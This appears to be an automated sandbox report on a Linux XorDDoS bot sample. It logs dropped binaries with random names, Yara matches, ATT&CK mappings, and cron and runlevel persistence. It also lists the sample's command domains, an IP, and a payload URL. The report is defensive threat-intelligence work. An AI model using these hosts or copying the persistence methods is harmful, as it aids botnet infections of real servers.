              Source: /usr/bin/cvltgpdmgk (PID: 5333)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cvltgpdmgk (PID: 5335)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cvltgpdmgk (PID: 5338)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tngemhgnzk (PID: 5346)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tngemhgnzk (PID: 5349)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tngemhgnzk (PID: 5351)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tngemhgnzk (PID: 5354)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tngemhgnzk (PID: 5357)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/njezqqgxiu (PID: 5364)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/njezqqgxiu (PID: 5367)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/njezqqgxiu (PID: 5370)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/njezqqgxiu (PID: 5372)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/njezqqgxiu (PID: 5375)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wzulpfbuxk (PID: 5385)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wzulpfbuxk (PID: 5388)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wzulpfbuxk (PID: 5390)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wzulpfbuxk (PID: 5393)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wzulpfbuxk (PID: 5396)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/aoyymackpm (PID: 5402)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/aoyymackpm (PID: 5405)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/aoyymackpm (PID: 5408)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/aoyymackpm (PID: 5411)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/aoyymackpm (PID: 5413)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gbsknxiwip (PID: 5419)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gbsknxiwip (PID: 5422)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gbsknxiwip (PID: 5424)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gbsknxiwip (PID: 5427)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gbsknxiwip (PID: 5429)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gpcmhoiszu (PID: 5436)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gpcmhoiszu (PID: 5439)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gpcmhoiszu (PID: 5442)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gpcmhoiszu (PID: 5445)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gpcmhoiszu (PID: 5447)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qizbpqmtbi (PID: 5456)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qizbpqmtbi (PID: 5459)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qizbpqmtbi (PID: 5461)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qizbpqmtbi (PID: 5464)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qizbpqmtbi (PID: 5467)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cvvhpkxdyk (PID: 5473)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cvvhpkxdyk (PID: 5476)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cvvhpkxdyk (PID: 5479)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cvvhpkxdyk (PID: 5481)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cvvhpkxdyk (PID: 5484)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/oscovqjuil (PID: 5490)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/oscovqjuil (PID: 5493)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/oscovqjuil (PID: 5496)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/oscovqjuil (PID: 5499)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/oscovqjuil (PID: 5504)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cxictzyxcu (PID: 5510)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cxictzyxcu (PID: 5513)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cxictzyxcu (PID: 5516)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cxictzyxcu (PID: 5519)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cxictzyxcu (PID: 5522)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qfvvwlqqkq (PID: 5527)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qfvvwlqqkq (PID: 5530)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qfvvwlqqkq (PID: 5533)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qfvvwlqqkq (PID: 5536)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qfvvwlqqkq (PID: 5538)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/yfmoszlrcg (PID: 5547)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/yfmoszlrcg (PID: 5550)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/yfmoszlrcg (PID: 5553)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/yfmoszlrcg (PID: 5555)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/yfmoszlrcg (PID: 5558)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ohcvvmubid (PID: 5564)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ohcvvmubid (PID: 5566)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ohcvvmubid (PID: 5569)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ohcvvmubid (PID: 5572)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ohcvvmubid (PID: 5575)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/kswkpwzxrd (PID: 5581)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/kswkpwzxrd (PID: 5583)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/kswkpwzxrd (PID: 5586)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/kswkpwzxrd (PID: 5588)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/kswkpwzxrd (PID: 5591)Queries kernel information via 'uname': Jump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

              Remote Access Functionality

              barindex
              Yara detected XorDDoS Bot
              Source: Yara matchFile source: 0Xorddos.o, type: SAMPLE
              Source: Yara matchFile source: 5313.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5337.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5428.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5316.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5546.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5455.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5356.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5412.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5532.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5261.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5267.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5225.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5426.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5407.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5438.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5273.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5345.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5537.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5291.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5401.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5512.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5296.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5480.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5418.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5435.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5311.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5223.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5463.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5332.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5294.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5284.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5444.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5224.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5404.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5515.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5466.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5389.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5395.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5421.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5326.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5363.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5534.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5308.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5276.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5366.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5526.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5478.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5302.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5552.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5387.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5495.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5279.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5529.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5329.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5482.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5509.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5492.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5441.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5374.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5472.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5264.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5410.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5348.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5319.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5475.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5281.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5502.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5521.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5254.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5299.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5392.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5517.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5369.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5460.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5334.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5259.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5446.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5549.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5384.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5458.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5498.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5423.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5371.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5489.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5353.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5350.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5221.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5221, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5223, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5224, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5225, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5254, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5259, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5261, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5264, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5267, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5273, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5279, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5281, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5284, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5291, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5294, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5296, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5299, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5302, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5308, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5311, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5313, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5316, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5319, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5326, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5329, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5334, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5337, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5345, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5348, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5350, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5353, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5356, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5363, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5366, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5369, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5371, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5374, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5384, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5387, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5389, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5395, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5401, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5404, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5407, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5410, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5412, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5418, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5421, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5423, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5426, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5435, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5438, type: MEMORYSTR
              Source: Yara matchFile source: /usr/bin/cvvhpkxdyk, type: DROPPED
              Source: Yara matchFile source: /usr/bin/wzulpfbuxk, type: DROPPED
              Source: Yara matchFile source: /usr/bin/njezqqgxiu, type: DROPPED
              Source: Yara matchFile source: /usr/bin/tngemhgnzk, type: DROPPED
              Source: Yara matchFile source: /usr/bin/aoyymackpm, type: DROPPED
              Source: Yara matchFile source: /usr/bin/qizbpqmtbi, type: DROPPED
              Source: Yara matchFile source: /usr/bin/gbsknxiwip, type: DROPPED
              Source: Yara matchFile source: /usr/bin/uqxezzsakx, type: DROPPED
              Source: Yara matchFile source: /usr/lib/libudev.so, type: DROPPED
              Source: Yara matchFile source: /usr/bin/cukrqcagnz, type: DROPPED
              Source: Yara matchFile source: /usr/bin/cvltgpdmgk, type: DROPPED
              Source: Yara matchFile source: /usr/bin/zareoppgxh, type: DROPPED
              Source: Yara matchFile source: /usr/bin/gpcmhoiszu, type: DROPPED
              Source: Yara matchFile source: /usr/bin/ysrkbnorkl, type: DROPPED

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts2
              Scripting              		1
              Systemd Service              		1
              Systemd Service              		11
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts2
              At (Linux)              		2
              At (Linux)              		2
              At (Linux)              		2
              Scripting              		LSASS Memory2
              System Information Discovery              		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
              Non-Application Layer Protocol              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              File Deletion              		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
              Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
              Ingress Tool Transfer              		SIM Card SwapCarrier Billing Fraud

              Malware Configuration

              No configs have been found

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 588994 Sample: 0Xorddos.o Startdate: 14/03/2022 Architecture: LINUX Score: 100 72 ppp.gggatat456.com 54.36.145.106, 53 OVHFR France 2->72 74 www1.gggatat456.com 2->74 76 9 other IPs or domains 2->76 78 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 Antivirus detection for dropped file 2->82 84 5 other signatures 2->84 10 0Xorddos.o 2->10         started        12 systemd snapd-env-generator 2->12         started        signatures3 process4 process5 14 0Xorddos.o 10->14         started        file6 64 /usr/lib/libudev.so, ELF 14->64 dropped 66 /usr/bin/zareoppgxh, ELF 14->66 dropped 68 /usr/bin/ysrkbnorkl, ELF 14->68 dropped 70 13 other malicious files 14->70 dropped 92 Drops files in suspicious directories 14->92 94 Sample deletes itself 14->94 96 Sample tries to persist itself using cron 14->96 98 Sample tries to persist itself using System V runlevels 14->98 18 0Xorddos.o sh 14->18         started        22 0Xorddos.o 14->22         started        24 0Xorddos.o 14->24         started        26 95 other processes 14->26 signatures7 process8 file9 62 /etc/crontab, ASCII 18->62 dropped 86 Sample tries to persist itself using cron 18->86 28 sh sed 18->28         started        31 0Xorddos.o uqxezzsakx 22->31         started        33 0Xorddos.o uqxezzsakx 24->33         started        35 0Xorddos.o uqxezzsakx 26->35         started        37 0Xorddos.o uqxezzsakx 26->37         started        39 0Xorddos.o uqxezzsakx 26->39         started        41 92 other processes 26->41 signatures10 process11 signatures12 90 Sample tries to persist itself using cron 28->90 43 uqxezzsakx 31->43         started        46 uqxezzsakx 33->46         started        48 uqxezzsakx 35->48         started        50 uqxezzsakx 37->50         started        52 uqxezzsakx 39->52         started        54 cukrqcagnz 41->54         started        56 cukrqcagnz 41->56         started        58 cukrqcagnz 41->58         started        60 88 other processes 41->60 process13 signatures14 88 Sample deletes itself 43->88

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              0Xorddos.o67%VirustotalBrowse
              0Xorddos.o68%MetadefenderBrowse
              0Xorddos.o83%ReversingLabsLinux.Network.XorDDoS
              0Xorddos.o100%AviraLINUX/Xorddos.cona
              0Xorddos.o100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              /usr/bin/njezqqgxiu100%AviraLINUX/Xorddos.cona
              /usr/bin/uqxezzsakx100%AviraLINUX/Xorddos.cona
              /usr/bin/ysrkbnorkl100%AviraLINUX/Xorddos.cona
              /usr/bin/cukrqcagnz100%AviraLINUX/Xorddos.cona
              /usr/bin/cvvhpkxdyk100%AviraLINUX/Xorddos.cona
              /usr/bin/tngemhgnzk100%AviraLINUX/Xorddos.cona
              /usr/bin/qizbpqmtbi100%AviraLINUX/Xorddos.cona
              /usr/lib/libudev.so100%AviraLINUX/Xorddos.cona
              /usr/bin/cvltgpdmgk100%AviraLINUX/Xorddos.cona
              /usr/bin/zareoppgxh100%AviraLINUX/Xorddos.cona
              /usr/bin/gbsknxiwip100%AviraLINUX/Xorddos.cona
              /usr/bin/gpcmhoiszu100%AviraLINUX/Xorddos.cona
              /usr/bin/aoyymackpm100%AviraLINUX/Xorddos.cona
              /usr/bin/wzulpfbuxk100%AviraLINUX/Xorddos.cona
              /usr/bin/njezqqgxiu100%Joe Sandbox ML
              /usr/bin/uqxezzsakx100%Joe Sandbox ML
              /usr/bin/ysrkbnorkl100%Joe Sandbox ML
              /usr/bin/cukrqcagnz100%Joe Sandbox ML
              /usr/bin/cvvhpkxdyk100%Joe Sandbox ML
              /usr/bin/tngemhgnzk100%Joe Sandbox ML
              /usr/bin/qizbpqmtbi100%Joe Sandbox ML
              /usr/lib/libudev.so100%Joe Sandbox ML
              /usr/bin/cvltgpdmgk100%Joe Sandbox ML
              /usr/bin/zareoppgxh100%Joe Sandbox ML
              /usr/bin/gbsknxiwip100%Joe Sandbox ML
              /usr/bin/gpcmhoiszu100%Joe Sandbox ML
              /usr/bin/aoyymackpm100%Joe Sandbox ML
              /usr/bin/wzulpfbuxk100%Joe Sandbox ML
              /etc/cron.hourly/gcc.sh0%MetadefenderBrowse
              /etc/cron.hourly/gcc.sh28%ReversingLabsLinux.Trojan.XorDDoS

              Domains

              SourceDetectionScannerLabelLink
              ppp.gggatat456.com6%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qi100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tn100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ys100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9nj100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9uq100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gb100%Avira URL Cloudmalware
